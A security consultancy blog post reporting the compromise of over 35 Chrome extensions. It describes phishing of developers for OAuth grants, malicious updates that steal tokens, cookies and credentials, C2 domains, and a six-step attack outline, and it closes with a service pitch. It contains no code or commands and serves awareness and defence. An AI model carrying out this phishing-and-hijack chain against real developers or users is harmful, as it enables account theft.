35+ Browser Extensions Compromised

Written By Luke Stephenson

Today, we're diving into a concerning development that has recently shaken the cyber world. As your lead security researcher, it's crucial to shed light on the recent hijacking of over 35 Google Chrome extensions, which has affected approximately 2.6 million users. This incident serves as a stark reminder of the vulnerabilities that can be exploited within trusted platforms.

The Attack Unveiled

Hackers have ingeniously exploited a phishing campaign, masquerading as official notifications from Google Chrome Web Store Developer Support.

Their objective?

To deceive extension publishers into granting OAuth permissions, thereby bypassing the usually robust multi-factor authentication (MFA) mechanisms.

Once the attackers secured these permissions, they uploaded malicious versions of the targeted extensions to the Google Chrome Web Store. This malicious Javascript code aimed to exfiltrate sensitive information including user session tokens, cookies, and login credentials—particularly those related to social media accounts and Facebook Ads dashboards.

Who Was Impacted?

The affected extensions span a wide range of categories, from VPN services and AI-powered browser integrations to productivity tools. Among the compromised were popular names like "AI Assistant," "VPNCity," "Reader Mode," and "Web Mirror." The scale and sophistication of this breach highlight the attackers' determination and expertise.

The Technical Breakdown

Cyberhaven, a data protection company, was one of the first to identify the breach. They confirmed that their extension was compromised on Christmas Eve. During their investigation, they discovered hard-coded command and control (C2) domains within the malicious JavaScript files. These domains facilitated remote configuration downloads and data exfiltration, showcasing the attackers' advanced capabilities.

Threat Model

Here's a quick breakdown of the steps involved in this attack:

  1. Phishing Campaign Initiation: Attackers send deceptive emails to extension developers.

  2. OAuth Permission Granting: Developers are tricked into granting permissions.

  3. Malicious Code Injection: Malicious versions of extensions are uploaded.

  4. User Installation/Update: Compromised extensions are installed by users.

  5. Data Exfiltration: Sensitive information is stolen.

  6. Remote Command and Control: C2 domains allow further exploitation.

In Conclusion

This incident underscores the importance of rigorous security practices for both developers and users. While it is possible to navigate the digital world solo, when your business or assets are at risk it’s always better to involve trusted security professionals. At LMS Solutions Consulting we provide powerful tools and policies to prevent outcomes such as this.

As always, stay safe and remain vigilant. If you have any concerns or need further insights, feel free to reach out. Together, we can navigate these digital threats and fortify our defenses.

Stay secure,

Luke Stephenson

Luke Stephenson
Previous

The Growing Challenge of Multi-Vector Persistent Threats